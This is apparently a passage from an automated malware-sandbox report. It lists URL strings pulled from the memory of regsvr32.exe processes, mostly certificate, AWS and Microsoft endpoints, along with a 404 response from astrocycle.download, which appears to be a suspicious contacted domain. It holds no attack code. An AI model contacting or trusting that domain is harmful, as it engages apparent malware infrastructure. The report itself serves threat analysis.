72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>

Source: regsvr32.exe, 00000004.00000002.2089822368.0000000000403000.00000004.00000020.sdmp	String found in binary or memory: http://astrocycle.download/nection
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000004.00000002.2089768444.000000000038E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
Source: regsvr32.exe, 00000004.00000002.2089768444.000000000038E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
Source: regsvr32.exe, 00000004.00000002.2089768444.000000000038E000.00000004.00000020.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: regsvr32.exe, 00000004.00000002.2089768444.000000000038E000.00000004.00000020.sdmp	String found in binary or memory: http://crt.rootg2.amaz
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
Source: regsvr32.exe, 00000004.00000002.2089768444.000000000038E000.00000004.00000020.sdmp	String found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
Source: regsvr32.exe, 00000004.00000002.2091334487.0000000002F90000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: regsvr32.exe, 00000004.00000002.2091334487.0000000002F90000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: regsvr32.exe, 00000004.00000002.2092067785.0000000003177000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: regsvr32.exe, 00000004.00000002.2092067785.0000000003177000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://o.ss2.us/0
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.2089768444.000000000038E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.rootg2.amazontrust.com08
Source: regsvr32.exe, 00000004.00000002.2089768444.000000000038E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.sca1b.amazontrust.com06
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://s.ss2.us/r.crl0
Source: regsvr32.exe, 00000004.00000002.2090932713.0000000002BA0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2082554663.0000000001C90000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2089905889.0000000001CE0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2090487136.0000000001D60000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000004.00000002.2092067785.0000000003177000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: regsvr32.exe, 00000004.00000002.2092067785.0000000003177000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2090932713.0000000002BA0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000004.00000002.2091334487.0000000002F90000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: regsvr32.exe, 00000004.00000002.2092067785.0000000003177000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: regsvr32.exe, 00000004.00000002.2091334487.0000000002F90000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000002.2091334487.0000000002F90000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: http://x.ss2.us/x.cer0&
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.47/js
Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.76
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.css
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/directories
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-cardsui
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-head.js
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/librastandardlib
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.112/plc
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/psf/null
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com;
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: https://amazon.com/
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://amazonwebservices.d2.sc.omtrdc.net
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://anchor.fm
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://aws-quickstart.s3.amazonaws.com
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/
Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/?nc2=h_lg
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ar/
Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/cn/
Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/de/
Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/es/
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/fr/
Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2086065196.000000000337F000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/id/
Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/it/
Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/jp/
Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ko/
Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/pt/
Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ru/
Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search/
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search/?searchQuery=
Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/th/
Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tr/
Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tw/
Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/vi/
Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://awsmedia.s3.amazonaws.com
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://c0.b0.p.awsstatic.com
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://calculator.aws
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://chtbl.com
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/console/home
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&src=footer-signin-mobile
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://d1.awsstatic-china.com
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://d1.awsstatic.com
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://d1hemuljm71t2j.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://d1le29qyzha1u4.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://d1oqpvwii7b6rh.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://d1vo51ubqkiilx.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://d1yyh5dhdgifnx.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://d2908q01vomqb2.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://d2a6igt6jhaluh.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://d36cz9buwru1tt.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://d3ctxlq1ktw2nl.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://d3h2ozso0dirfl.cloudfront.net
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&fmt=gif
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://devices.amazonaws.com?hp=tile&so-exp=below
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://dgen8gghn3u86.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://dk261l6wntthl.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://docs.aws.amazon.com
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://download.stormacq.com/aws/podcast/
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://dpm.demdex.net
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://dts.podtrac.com
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://fls-na.amazon.com
Source: regsvr32.exe, 00000004.00000003.2086240619.000000000039C000.00000004.00000001.sdmp	String found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://img.youtube.com
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://marketingplatform.google.com
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://media.amazonwebservices.com
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://mktg-apac.s3-ap-southeast-1.amazonaws.com
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://p.adsymptotic.com
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&story=fico
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&story=zllw
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&sc_icampaign=
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&src=default
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&src=default
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://press.aboutamazon.com/press-releases/aws
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submit
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1Q1PJ39CK1DRS268C8DS3X-Content-Ty
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://s3.amazonaws.com/aws-quickstart/
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://ssl-static.libsyn.com
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://static-cdn.jtvnw.net
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://static.doubleclick.net
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/awscloud
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: https://website.spot.ec2.aws.a2z.com
